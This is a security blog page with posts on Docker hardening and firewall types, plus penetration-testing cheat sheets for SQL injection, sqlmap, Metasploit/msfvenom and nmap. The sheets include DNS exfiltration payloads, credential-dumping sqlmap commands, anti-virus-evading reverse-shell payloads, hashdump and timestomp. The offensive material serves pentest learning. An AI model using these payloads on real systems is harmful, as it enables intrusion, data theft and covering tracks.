Posted in Software Engineering

10 Docker security best practices.

1. Prefer minimal base images

A common docker container security issue is that you end up with big images for your docker containers. Often times, you might start projects with a generic Docker container image such as writing a Dockerfile with a FROM node, as your “default”. However, when specifying the node image, you should take into consideration that the fully installed Debian Stretch distribution is the underlying image that is used to build it. If your project doesn’t require any general system libraries or system utilities then it is better to avoid using a full blown operating system (OS) as a base image.

graph of docker security 2020 shows top ten most popular docker images that vulnerabilities
Top ten most popular docker images each contain at least 30 vulnerabilities

Taken from the open source security report 2020, as can be seen, each of the top ten Docker images we inspected on Docker Hub contained known vulnerabilities, except for Ubuntu. By preferring minimal images that bundle only the necessary system tools and libraries required to run your project, you are also minimizing the attack surface for attackers and ensuring that you ship a secure OS.

2. Least privileged user

When a Dockerfile doesn’t specify a USER, it defaults to executing the container using the root user. In practice, there are very few reasons why the container should have root privileges and it could very well manifest as a docker security issue. Docker defaults to running containers using the root user. When that namespace is then mapped to the root user in the running container, it means that the container potentially has root access on the Docker host. Having an application on the container run with the root user further broadens the attack surface and enables an easy path to privilege escalation if the application itself is vulnerable to exploitation.

To minimize exposure, opt-in to create a dedicated user and a dedicated group in the Docker image for the application; use the USER directive in the Dockerfile to ensure the container runs the application with the least privileged access possible.

A specific user might not exist in the image; create that user using the instructions in the Dockerfile.
The following demonstrates a complete example of how to do this for a generic Ubuntu image:

FROM ubuntu
RUN mkdir /app
RUN groupadd -r lirantal && useradd -r -s /bin/false -g lirantal lirantal
WORKDIR /app
COPY . /app
RUN chown -R lirantal:lirantal /app
USER lirantal
CMD node index.js

The example above:

  • creates a system user (-r), with no password, no home directory set, and no shell
  • adds the user we created to an existing group that we created beforehand (using groupadd)
  • adds a final argument set to the user name we want to create, in association with the group we created

If you’re a fan of Node.js and alpine images, they already bundle a generic user for you called node. Here’s a Node.js example, making use of the generic node user:

FROM node:10-alpine 
RUN mkdir /app
COPY . /app
RUN chown -R node:node /app
USER node
CMD [“node”, “index.js”]

If you’re developing Node.js applications, you may want to consult with the official Docker and Node.js Best Practices.

Test your docker images for vulnerabilities

3. Sign and verify images to mitigate MITM attacks

Authenticity of Docker images is a challenge. We put a lot of trust into these images as we are literally using them as the container that runs our code in production. Therefore, it is critical to make sure the image we pull is the one that is pushed by the publisher, and that no party has modified it. Tampering may occur over the wire, between the Docker client and the registry, or by compromising the registry of the owner’s account in order to push a malicious image to.

Verify docker images

Docker defaults allow pulling Docker images without validating their authenticity, thus potentially exposing you to arbitrary Docker images whose origin and author aren’t verified.

Make it a best practice that you always verify images before pulling them in, regardless of policy. To experiment with verification, temporarily enable Docker Content Trust with the following command:

export DOCKER_CONTENT_TRUST=1

Now attempt to pull an image that you know is not signed—the request is denied and the image is not pulled.

Sign docker images

Prefer Docker Certified images that come from trusted partners who have been vetted and curated by Docker Hub rather than images whose origin and authenticity you can’t validate.

Docker allows signing images, and by this, provides another layer of protection. To sign images, use Docker Notary. Notary verifies the image signature for you, and blocks you from running an image if the signature of the image is invalid.

When Docker Content Trust is enabled, as we exhibited above, a Docker image build signs the image. When the image is signed for the first time, Docker generates and saves a private key in ~/docker/trust for your user. This private key is then used to sign any additional images as they are built.

For detailed instructions on setting up signed images, refer to Docker’s official documentation.

How is signing docker images with Docker’s Content Trust and Notary different from using GPG? Diogo Mónica has a great talk on this but essentially GPG helps you with verification, not with replay attacks.

4. Find, fix and monitor for open source vulnerabilities

When we choose a base image for our Docker container, we indirectly take upon ourselves the risk of all the container security concerns that the base image is bundled with. This can be poorly configured defaults that don’t contribute to the security of the operating system, as well as system libraries that are bundled with the base image we chose.

A good first step is to make use of as minimal a base image as is possible while still being able to run your application without issues. This helps reduce the attack surface by limiting exposure to vulnerabilities; on the other hand, it doesn’t run any audits on its own, nor does it protect you from future vulnerabilities that may be disclosed for the version of the base image that you are using.

Therefore, one way of protecting against vulnerabilities in open source security software is to use tools such as Snyk, to add continuous docker security scanning and monitoring of vulnerabilities that may exist across all of the Docker image layers that are in use.

Snyk Docker Scanning and Remediation from the CLI

Scan a Docker image for known vulnerabilities with these commands:

# fetch the image to be tested so it exists locally
$ docker pull node:10
# scan the image with snyk
$ snyk test --docker node:10 --file=path/to/Dockerfile

Monitor a Docker image for known vulnerabilities so that once newly discovered vulnerabilities are found in the image, Snyk can notify and provide remediation advice:

$ snyk monitor --docker node:10

5. Don’t leak sensitive information to Docker images

Sometimes, when building an application inside a Docker image, you need secrets such as an SSH private key to pull code from a private repository, or you need tokens to install private packages. If you copy them into the Docker intermediate container they are cached on the layer to which they were added, even if you delete them later on. These tokens and keys must be kept outside of the Dockerfile.

Using multi-stage builds

Another aspect of improving docker container security is through the use of multi-stage builds. By leveraging Docker support for multi-stage builds, fetch and manage secrets in an intermediate image layer that is later disposed of so that no sensitive data reaches the image build. Use code to add secrets to said intermediate layer, such as in the following example:

FROM ubuntu as intermediate

WORKDIR /app
COPY secret/key /tmp/
RUN scp -i /tmp/key build@acme/files .

FROM ubuntu
WORKDIR /app
COPY --from=intermediate /app .

Using Docker secret commands

Use an alpha feature in Docker for managing secrets to mount sensitive files without caching them, similar to the following:

# syntax = docker/dockerfile:1.0-experimental
FROM alpine

# shows secret from default secret location
RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecre

# shows secret from custom secret location
RUN --mount=type=secret,id=mysecret,dst=/foobar cat /foobar

Read more about Docker secrets on their site.

Beware of recursive copy

You should also be mindful when copying files into the image that is being built. For example, the following command copies the entire build context folder, recursively, to the Docker image, which could end up copying sensitive files as well:

COPY . .

If you have sensitive files in your folder, either remove them or use .dockerignore to ignore them:

private.key
appsettings.json

6. Use fixed tags for immutability

Each Docker image can have multiple tags, which are variants of the same images. The most common tag is latest, which represents the latest version of the image. Image tags are not immutable, and the author of the images can publish the same tag multiple times.

This means that the base image for your Docker file might change between builds. This could result in inconsistent behavior because of changes made to the base image. There are multiple ways to mitigate this issue and improve your Docker security posture:

  • Prefer the most specific tag available. If the image has multiple tags, such as :8 and :8.0.1 or even :8.0.1-alpine, prefer the latter, as it is the most specific image reference. Avoid using the most generic tags, such as latest. Keep in mind that when pinning a specific tag, it might be deleted eventually.
  • To mitigate the issue of a specific image tag becoming unavailable and becoming a show-stopper for teams that rely on it, consider running a local mirror of this image in a registry or account that is under your own control. It’s important to take into account the maintenance overhead required for this approach—because it means you need to maintain a registry. Replicating the image you want to use in a registry that you own is good practice to make sure that the image you use does not change.
  • Be very specific! Instead of pulling a tag, pull an image using the specific SHA256 reference of the Docker image, which guarantees you get the same image for every pull. However notice that using a SHA256 reference can be risky, if the image changes that hash might not exist anymore.

7. Use COPY instead of ADD

Docker provides two commands for copying files from the host to the Docker image when building it: COPY and ADD. The instructions are similar in nature, but differ in their functionality and can result in a Docker container security issues for the image:

  • COPY — copies local files recursively, given explicit source and destination files or directories. With COPY, you must declare the locations.
  • ADD — copies local files recursively, implicitly creates the destination directory when it doesn’t exist, and accepts archives as local or remote URLs as its source, which it expands or downloads respectively into the destination directory.

While subtle, the differences between ADD and COPY are important. Be aware of these differences to avoid potential security issues:

  • When remote URLs are used to download data directly into a source location, they could result in man-in-the-middle attacks that modify the content of the file being downloaded. Moreover, the origin and authenticity of remote URLs need to be further validated. When using COPY the source for the files to be downloaded from remote URLs should be declared over a secure TLS connection and their origins need to be validated as well.
  • Space and image layer considerations: using COPY allows separating the addition of an archive from remote locations and unpacking it as different layers, which optimizes the image cache. If remote files are needed, combining all of them into one RUN command that downloads, extracts, and cleans-up afterwards optimizes a single layer operation over several layers that would be required if ADD were used.
  • When local archives are used, ADD automatically extracts them to the destination directory. While this may be acceptable, it adds the risk of zip bombs and Zip Slip vulnerabilities that could then be triggered automatically.

8. Use metadata labels

Image labels provide metadata for the image you’re building. This help users understand how to use the image easily. The most common label is “maintainer”, which specifies the email address and the name of the person maintaining this image. Add metadata with the following LABEL command:

LABEL maintainer="me@acme.com"

In addition to a maintainer contact, add any metadata that is important to you. This metadata could contain: a commit hash, a link to the relevant build, quality status (did all tests pass?), source code, a reference to your SECURITY.TXT file location and so on.

It is good practice to adopt a SECURITY.TXT (RFC5785) file that points to your responsible disclosure policy for your Docker label schema when adding labels, such as the following:

LABEL securitytxt="https://www.example.com/.well-known/security.txt"

See more information about labels for Docker images: https://label-schema.org/rc1/

9. Use multi-stage build for small and secure images

While building your application with a Dockerfile, many artifacts are created that are required only during build-time. These can be packages such as development tooling and libraries that are required for compiling, or dependencies that are required for running unit tests, temporary files, secrets, and so on.

Keeping these artifacts in the base image, which may be used for production, results in an increased Docker image size, and this can badly affect the time spent downloading it as well as increase the attack surface because more packages are installed as a result. The same is true for the Docker image you’re using—you might need a specific Docker image for building, but not for running the code of your application.

Golang is a great example. To build a Golang application, you need the Go compiler. The compiler produces an executable that runs on any operating system, without dependencies, including scratch images.

This is a good reason why Docker has the multi-stage build capability. This feature allows you to use multiple temporary images in the build process, keeping only the latest image along with the information you copied into it. In this way, you have two images:

  • First image—a very big image size, bundled with many dependencies that are used in order to build your app and run tests.
  • Second image—a very thin image in terms of size and number of libraries, with only a copy of the artifacts required to run the app in production.

10. Use a linter

Adopt the use of a linter to avoid common mistakes and establish best practice guidelines that engineers can follow in an automated way. This is a helpful docker security scanning task to statically analyze Dockerfile security issues.

One such linter is hadolint. It parses a Dockerfile and shows a warning for any errors that do not match its best practice rules.

dockerfile security lint static code analysis by hadolint

Hadolint is even more powerful when it is used inside an integrated development environment (IDE). For example, when using hadolint as a VSCode extension, linting errors appear while typing. This helps in writing better Dockerfiles faster.

Be sure to print out the cheat sheet and pin it up somewhere to remind you of some of the docker image security best practices you should follow when building and working with docker images!

How do you harden a docker container image?

You may use linters such as hadolint or dockle to ensure the Dockerfile has secure configuration. Make sure you also scan your container images to avoid vulnerabilities with a severe security impact in your production containers

Posted in Security

SQL Injection cheat sheet

This SQL injection cheat sheet contains examples of useful syntax that you can use to perform a variety of tasks that often arise when performing SQL injection attacks.

String concatenation

You can concatenate together multiple strings to make a single string.

Oracle'foo'||'bar'
Microsoft'foo'+'bar'
PostgreSQL'foo'||'bar'
MySQL'foo' 'bar' [Note the space between the two strings]
CONCAT('foo','bar')

Substring

You can extract part of a string, from a specified offset with a specified length. Note that the offset index is 1-based. Each of the following expressions will return the string ba.

OracleSUBSTR('foobar', 4, 2)
MicrosoftSUBSTRING('foobar', 4, 2)
PostgreSQLSUBSTRING('foobar', 4, 2)
MySQLSUBSTRING('foobar', 4, 2)

Comments

You can use comments to truncate a query and remove the portion of the original query that follows your input.

Oracle--comment
Microsoft--comment
/*comment*/
PostgreSQL--comment
/*comment*/
MySQL#comment
-- comment [Note the space after the double dash]
/*comment*/

Database version

You can query the database to determine its type and version. This information is useful when formulating more complicated attacks.

OracleSELECT banner FROM v$version
SELECT version FROM v$instance
MicrosoftSELECT @@version
PostgreSQLSELECT version()
MySQLSELECT @@version

Database contents

You can list the tables that exist in the database, and the columns that those tables contain.

OracleSELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
MicrosoftSELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
PostgreSQLSELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'
MySQLSELECT * FROM information_schema.tables
SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE'

Conditional errors

You can test a single boolean condition and trigger a database error if the condition is true.

OracleSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual
MicrosoftSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END
PostgreSQLSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END
MySQLSELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a')

Batched (or stacked) queries

You can use batched queries to execute multiple queries in succession. Note that while the subsequent queries are executed, the results are not returned to the application. Hence this technique is primarily of use in relation to blind vulnerabilities where you can use a second query to trigger a DNS lookup, conditional error, or time delay.

OracleDoes not support batched queries.
MicrosoftQUERY-1-HERE; QUERY-2-HERE
PostgreSQLQUERY-1-HERE; QUERY-2-HERE
MySQLDoes not support batched queries.

Time delays

You can cause a time delay in the database when the query is processed. The following will cause an unconditional time delay of 10 seconds.

Oracledbms_pipe.receive_message(('a'),10)
MicrosoftWAITFOR DELAY '0:0:10'
PostgreSQLSELECT pg_sleep(10)
MySQLSELECT sleep(10)

Conditional time delays

You can test a single boolean condition and trigger a time delay if the condition is true.

OracleSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
MicrosoftIF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
PostgreSQLSELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
MySQLSELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')

DNS lookup

You can cause the database to perform a DNS lookup to an external domain. To do this, you will need to use Burp Collaborator client to generate a unique Burp Collaborator subdomain that you will use in your attack, and then poll the Collaborator server to confirm that a DNS lookup occurred.

OracleThe following technique leverages an XML external entity (XXE) vulnerability to trigger a DNS lookup. The vulnerability has been patched but there are many unpatched Oracle installations in existence:
SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual

The following technique works on fully patched Oracle installations, but requires elevated privileges:
SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net')
Microsoftexec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a'
PostgreSQLcopy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net'
MySQLThe following techniques work on Windows only:
LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')
SELECT ... INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'

DNS lookup with data exfiltration

You can cause the database to perform a DNS lookup to an external domain containing the results of an injected query. To do this, you will need to use Burp Collaborator client to generate a unique Burp Collaborator subdomain that you will use in your attack, and then poll the Collaborator server to retrieve details of any DNS interactions, including the exfiltrated data.

OracleSELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual
Microsoftdeclare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a"')
PostgreSQLcreate OR replace function f() returns void as $$
declare c text;
declare p text;
begin
SELECT into p (SELECT YOUR-QUERY-HERE);
c := 'copy (SELECT '''') to program ''nslookup '||p||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net''';
execute c;
END;
$$ language plpgsql security definer;
SELECT f();
MySQLThe following technique works on Windows only:
SELECT YOUR-QUERY-HERE INTO OUTFILE '\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a'
Posted in Security

8 Types of Firewalls

types of firewalls

Firewall types can be divided into several different categories based on their general structure and method of operation. Here are eight types of firewalls:

  • Packet-filtering firewalls
  • Circuit-level gateways
  • Stateful inspection firewalls
  • Application-level gateways (a.k.a. proxy firewalls)
  • Next-gen firewalls
  • Software firewalls
  • Hardware firewalls
  • Cloud firewalls

Note: The last three bullets list methods of delivering firewall functionality, rather than being types of firewall architectures in and of themselves.

How do these firewalls work? And, which ones are the best for your business’ cybersecurity needs?

Here are a few brief explainers:

Packet-Filtering Firewalls

Types of firewall architectures

As the most “basic” and oldest type of firewall architecture, packet-filtering firewalls basically create a checkpoint at a traffic router or switch. The firewall performs a simple check of the data packets coming through the router—inspecting information such as the destination and origination IP address, packet type, port number, and other surface-level information without opening up the packet to inspect its contents.

If the information packet doesn’t pass the inspection, it is dropped.

The good thing about these firewalls is that they aren’t very resource-intensive. This means they don’t have a huge impact on system performance and are relatively simple. However, they’re also relatively easy to bypass compared to firewalls with more robust inspection capabilities.

Circuit-Level Gateways

As another simplistic firewall type that is meant to quickly and easily approve or deny traffic without consuming significant computing resources, circuit-level gateways work by verifying the transmission control protocol (TCP) handshake. This TCP handshake check is designed to make sure that the session the packet is from is legitimate.

While extremely resource-efficient, these firewalls do not check the packet itself. So, if a packet held malware, but had the right TCP handshake, it would pass right through. This is why circuit-level gateways are not enough to protect your business by themselves.

Stateful Inspection Firewalls

These firewalls combine both packet inspection technology and TCP handshake verification to create a level of protection greater than either of the previous two architectures could provide alone.

However, these firewalls do put more of a strain on computing resources as well. This may slow down the transfer of legitimate packets compared to the other solutions.

Proxy Firewalls (Application-Level Gateways/Cloud Firewalls)

Proxy firewalls operate at the application layer to filter incoming traffic between your network and the traffic source—hence, the name “application-level gateway.” These firewalls are delivered via a cloud-based solution or another proxy device. Rather than letting traffic connect directly, the proxy firewall first establishes a connection to the source of the traffic and inspects the incoming data packet.

This check is similar to the stateful inspection firewall in that it looks at both the packet and at the TCP handshake protocol. However, proxy firewalls may also perform deep-layer packet inspections, checking the actual contents of the information packet to verify that it contains no malware.

Once the check is complete, and the packet is approved to connect to the destination, the proxy sends it off. This creates an extra layer of separation between the “client” (the system where the packet originated) and the individual devices on your network—obscuring them to create additional anonymity and protection for your network.

If there’s one drawback to proxy firewalls, it’s that they can create significant slowdown because of the extra steps in the data packet transferal process.

Next-Generation Firewalls

Many of the most recently-released firewall products are being touted as “next-generation” architectures. However, there is not as much consensus on what makes a firewall truly next-gen.

Some common features of next-generation firewall architectures include deep-packet inspection (checking the actual contents of the data packet), TCP handshake checks, and surface-level packet inspection. Next-generation firewalls may include other technologies as well, such as intrusion prevention systems (IPSs) that work to automatically stop attacks against your network.

The issue is that there is no one definition of a next-generation firewall, so it’s important to verify what specific capabilities such firewalls have before investing in one.

Software Firewalls

Software firewalls include any type of firewall that is installed on a local device rather than a separate piece of hardware (or a cloud server). The big benefit of a software firewall is that it’s highly useful for creating defense in depth by isolating individual network endpoints from one another.

However, maintaining individual software firewalls on different devices can be difficult and time-consuming. Furthermore, not every device on a network may be compatible with a single software firewall, which may mean having to use several different software firewalls to cover every asset.

Hardware Firewalls

Hardware firewalls use a physical appliance that acts in a manner similar to a traffic router to intercept data packets and traffic requests before they’re connected to the network’s servers. Physical appliance-based firewalls like this excel at perimeter security by making sure malicious traffic from outside the network is intercepted before the company’s network endpoints are exposed to risk.

The major weakness of a hardware-based firewall, however, is that it is often easy for insider attacks to bypass them. Also, the actual capabilities of a hardware firewall may vary depending on the manufacturer—some may have a more limited capacity to handle simultaneous connections than others, for example.

Cloud Firewalls

Hand shows a data cloud with a protective shield for cloud firewall

Whenever a cloud solution is used to deliver a firewall, it can be called a cloud firewall, or firewall-as-a-service (FaaS). Cloud firewalls are considered synonymous with proxy firewalls by many, since a cloud server is often used in a proxy firewall setup (though the proxy doesn’t necessarily have to be on the cloud, it frequently is).

The big benefit of having cloud-based firewalls is that they are very easy to scale with your organization. As your needs grow, you can add additional capacity to the cloud server to filter larger traffic loads. Cloud firewalls, like hardware firewalls, excel at perimeter security.

Posted in Software Engineering

Why Container Orchestrator

Although we can manually maintain a couple of containers or write scripts for dozens of containers, orchestrators make things much easier for operators especially when it comes to managing hundreds and thousands of containers running on a global infrastructure.Most container orchestrators can:

  • Group hosts together while creating a cluster
  • Schedule containers to run on hosts in the cluster based on resources availability
  • Enable containers in a cluster to communicate with each other regardless of the host they are deployed to in the cluster
  • Bind containers and storage resources
  • Group sets of similar containers and bind them to load-balancing constructs to simplify access to containerized applications by creating a level of abstraction between the containers and the user
  • Manage and optimize resource usage
  • Allow for implementation of policies to secure access to applications running inside containers.

With all these configurable yet flexible features, container orchestrators are an obvious choice when it comes to managing containerised applications at scale. In this course, we will explore Kubernetes, one of the most in-demand container orchestration tools available today.

 

Most container orchestrators can be deployed on the infrastructure of our choice – on bare metal, Virtual Machines, on-premise, or the public cloud. Kubernetes, for example, can be deployed on a workstation, with or without a local hypervisor such as Oracle VirtualBox, inside a company’s data center, in the cloud on AWS Elastic Compute Cloud (EC2) instances, Google Compute Engine (GCE) VMs, DigitalOcean Droplets, OpenStack, etc.

There are turnkey solutions which allow Kubernetes clusters to be installed, with only a few commands, on top of cloud Infrastructures-as-a-Service, such as GCE, AWS EC2, Docker Enterprise, IBM Cloud, Rancher, VMware, Pivotal, and multi-cloud solutions through IBM Cloud Private and StackPointCloud.

Last but not least, there is the managed container orchestration as-a-Service, more specifically the managed Kubernetes as-a-Service solution, offered and hosted by the major cloud providers, such as Google Kubernetes Engine (GKE), Amazon Elastic Container Service for Kubernetes (Amazon EKS), Azure Kubernetes Service (AKS), IBM Cloud Kubernetes ServiceDigitalOcean KubernetesOracle Container Engine for Kubernetes, etc.

Posted in Security

SQL Map Cheat Sheet

Easy Scanning option

sqlmap -u "http://testsite.com/login.php"

Scanning by using tor

sqlmap -u "http://testsite.com/login.php" --tor --tor-type=SOCKS5

Scanning by manually setting the return time

sqlmap -u "http://testsite.com/login.php" --time-sec 15

List all databases at the site

sqlmap -u "http://testsite.com/login.php" --dbs

List all tables in a specific database

sqlmap -u "http://testsite.com/login.php" -D site_db --tables

Dump the contents of a DB table

sqlmap -u "http://testsite.com/login.php" -D site_db -T users –dump

List all columns in a table

sqlmap -u "http://testsite.com/login.php" -D site_db -T users --columns

Dump only selected columns

sqlmap -u "http://testsite.com/login.php" -D site_db -T users -C username,password --dump

Dump a table from a database when you have admin credentials

sqlmap -u "http://testsite.com/login.php" –method "POST" –data "username=admin&password=admin&submit=Submit" -D social_mccodes -T users –dump

Get OS Shell

sqlmap --dbms=mysql -u "http://testsite.com/login.php" --os-shell

Get SQL Shell

sqlmap --dbms=mysql -u "http://testsite.com/login.php" --sql-shell
Posted in Security

Mobile Device Security

Android

Root

  • Root (connected to PC): Dr.Fone – Root, Kingo, SRSRoot,Root Genius, iRoot
  • Root (App): SuperSU Pro Root App, Superuser Root App,Superuser X [L] Root App

Other:

  • zANTI is an easy to use penetration testing and a security analysis toolkit.
  • Tealium Charles Proxy , proxy server for android

IOS

  • Jailbreak (online): Hexxa Plus ,
  • Jailbreak (connected to PC) Unc0ver, pangu Jail break, Checkra1n, Virtual Jailbreak,Hardware Jailbreak

Other:

class-dump is a command-line utility for examining the Objective-C runtime information stored in Mach-O files. It generates declarations for the classes, categories and protocols. This is the same information provided by using ‘otool -ov’, but presented as normal Objective-C declarations, so it is much more compact and readable.

ipash ME (Micro Edition) – the missing command line shell for iPhone! Manage your iPhone and files from command

Keychain is the password management system in macOS, developed by Apple. 

IDA Pro is a disassembler, debugger, interactive. It is a piece of software used to translate machine code into a human readable format called assembly language. It is available for Windows, Linux, MacOS

Posted in Security

Metasploit cheat sheet

The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures.

Metasploit is a popular tool used by pentest experts. I have prepared a document for you to learn.

Metasploit :

Search for module:
msf > search [regex]

Specify and exploit to use:
msf > use exploit/[ExploitPath]

Specify a Payload to use:
msf > set PAYLOAD [PayloadPath]

Show options for the current modules:
msf > show options

Set options:
msf > set [Option] [Value]

Start exploit:
msf > exploit 

Useful Auxiliary Modules
Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS Enumeration:
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server:
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server:
msf > use auxiliary/server/socks4
msf > run 

msfvenom :

The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with ‘’-l payloads’ to get a list of payloads.

$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]

Example :

Reverse Meterpreter payload as an executable and redirected into a file:

$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe

Format Options (specified with –f) –help-formats – List available output formats

exe – Executable pl – Perl rb – Ruby raw – Raw shellcode c – C code

Encoding Payloads with msfvenom

The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with ‘-l encoders’ to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]

Example

Encode a payload from msfpayload 5 times using shikata-ga-nai encoder and output as executable:

$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Meterpreter
Base Commands:

? / help: Display a summary of commands exit / quit: Exit the Meterpreter session

sysinfo: Show the system name and OS type

shutdown / reboot: Self-explanatory

File System Commands:

cd: Change directory

lcd: Change directory on local (attacker’s) machine

pwd / getwd: Display current working directory

ls: Show the contents of the directory

cat: Display the contents of a file on screen

download / upload: Move files to/from the target machine

mkdir / rmdir: Make / remove directory

edit: Open a file in the default editor (typically vi)

Process Commands:

getpid: Display the process ID that Meterpreter is running inside.

getuid: Display the user ID that Meterpreter is running with.

ps: Display process list.

kill: Terminate a process given its process ID.

execute: Run a given program with the privileges of the process the Meterpreter is loaded in.

migrate: Jump to a given destination process ID

  • Target process must have same or lesser privileges
  • Target process may be a more stable process
  • When inside a process, can access any files that process has a lock on.
Network Commands:

ipconfig: Show network interface information

portfwd: Forward packets through TCP session

route: Manage/view the system’s routing table

Misc Commands:

idletime: Display the duration that the GUI of thetarget machine has been idle.

uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine.

screenshot: Save as an image a screenshot of the target machine.

Additional Modules:

use [module]: Load the specified module

Example:

use priv: Load the priv module

hashdump: Dump the hashes from the box

timestomp:Alter NTFS file timestamps

Managing Sessions
Multiple Exploitation:

Run the exploit expecting a single session that is immediately backgrounded:

msf > exploit -z

Run the exploit in the background expecting one or more sessions that are immediately backgrounded:

msf > exploit –j

List all current jobs (usually exploit listeners):
msf > jobs –l

Kill a job:
msf > jobs –k [JobID]

Multiple Sessions:
List all backgrounded sessions:
msf > sessions -l

Interact with a backgrounded session:
msf > session -i [SessionID]

Background the current interactive session:
meterpreter > <Ctrl+Z>
or
meterpreter > background

Routing Through Sessions:

All modules (exploits/post/aux) against the target subnet mask will be pivoted through this session.

msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]
Posted in Security

NMAP cheat sheet

Target Specification

Switch

Example

Description

nmap 192.168.1.1

Scan a single IP

nmap 192.168.1.1 192.168.2.1

Scan specific IPs

nmap 192.168.1.1-254

Scan a range

nmap scanme.nmap.org

Scan a domain

nmap 192.168.1.0/24

Scan using CIDR notation

-iL

nmap -iL targets.txt

Scan targets from a file

-iR

nmap -iR 100

Scan 100 random hosts

–exclude

nmap –exclude 192.168.1.1

Exclude listed hosts

Scan Techniques

Switch

Example

Description

-sS

nmap 192.168.1.1 -sS

TCP SYN port scan (Default)

-sT

nmap 192.168.1.1 -sT

TCP connect port scan
(Default without root privilege)

-sU

nmap 192.168.1.1 -sU

UDP port scan

-sA

nmap 192.168.1.1 -sA

TCP ACK port scan

-sW

nmap 192.168.1.1 -sW

TCP Window port scan

-sM

nmap 192.168.1.1 -sM

TCP Maimon port scan

Host Discovery

Switch

Example

Description

-sL

nmap 192.168.1.1-3 -sL

No Scan. List targets only

-sn

nmap 192.168.1.1/24 -sn

Disable port scanning. Host discovery only.

-Pn

nmap 192.168.1.1-5 -Pn

Disable host discovery. Port scan only.

-PS

nmap 192.168.1.1-5 -PS22-25,80

TCP SYN discovery on port x.

Port 80 by default

-PA

nmap 192.168.1.1-5 -PA22-25,80

TCP ACK discovery on port x.

Port 80 by default

-PU

nmap 192.168.1.1-5 -PU53

UDP discovery on port x.

Port 40125 by default

-PR

nmap 192.168.1.1-1/24 -PR

ARP discovery on local network

-n

nmap 192.168.1.1 -n

Never do DNS resolution

Port Specification

Switch

Example

Description

-p

nmap 192.168.1.1 -p 21

Port scan for port x

-p

nmap 192.168.1.1 -p 21-100

Port range

-p

nmap 192.168.1.1 -p U:53,T:21-25,80

Port scan multiple TCP and UDP ports

-p-

nmap 192.168.1.1 -p-

Port scan all ports

-p

nmap 192.168.1.1 -p http,https

Port scan from service name

-F

nmap 192.168.1.1 -F

Fast port scan (100 ports)

–top-ports

nmap 192.168.1.1 –top-ports 2000

Port scan the top x ports

-p-65535

nmap 192.168.1.1 -p-65535

Leaving off initial port in range
makes the scan start at port 1

-p0-

nmap 192.168.1.1 -p0-

Leaving off end port in range

makes the scan go through to port 65535

Service and Version Detection

Switch

Example

Description

-sV

nmap 192.168.1.1 -sV

Attempts to determine the version of the service running on port

-sV –version-intensity

nmap 192.168.1.1 -sV –version-intensity 8

Intensity level 0 to 9. Higher number increases possibility of correctness

-sV –version-light

nmap 192.168.1.1 -sV –version-light

Enable light mode. Lower possibility of correctness. Faster

-sV –version-all

nmap 192.168.1.1 -sV –version-all

Enable intensity level 9. Higher possibility of correctness. Slower

-A

nmap 192.168.1.1 -A

Enables OS detection, version detection, script scanning, and traceroute

OS Detection

Switch

Example

Description

-O

nmap 192.168.1.1 -O

Remote OS detection using TCP/IP
stack fingerprinting

-O –osscan-limit

nmap 192.168.1.1 -O –osscan-limit

If at least one open and one closed
TCP port are not found it will not try
OS detection against host

-O –osscan-guess

nmap 192.168.1.1 -O –osscan-guess

